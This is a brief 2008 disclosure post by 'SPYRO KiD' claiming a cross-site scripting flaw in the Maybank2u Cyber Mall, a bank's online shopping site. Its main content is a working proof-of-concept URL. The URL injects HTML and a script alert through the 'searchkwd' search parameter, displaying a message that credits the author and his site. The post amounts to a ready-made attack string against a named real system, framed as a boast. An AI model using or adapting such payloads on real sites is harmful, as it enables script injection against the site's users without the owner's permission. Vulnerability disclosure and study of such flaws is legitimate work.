Maybank2u Cyber Mall Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Monday, July 21st, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: maybank2u.net XSSED by SPYRO KiD}

maybank2u.net XSSED by SPYRO KiD

POC:

http://mall.maybank2u.net/main.jsp?pageid=SearchResult&searchkwd=%3Ccenter%3E%3Ch1%3EXSSED%3C/h1%3E%3Cbr%3Eby%3Cbr%3E%3Ch2%3ESPYRO%20KiD%3Cscript%3Ealert('%5Ct%5Ct%5Ct%20%20%20%20XSSED%5Cn%5Ct%5Ct%5Ct%5Ctby%5Cn%5Ct%5Ct%5CtSPYRO%20KiD%5Cn%5Ct%5Cthttp://spyrozone.net');%3C/script%3E%3Cnoscript%3E


//E.O.F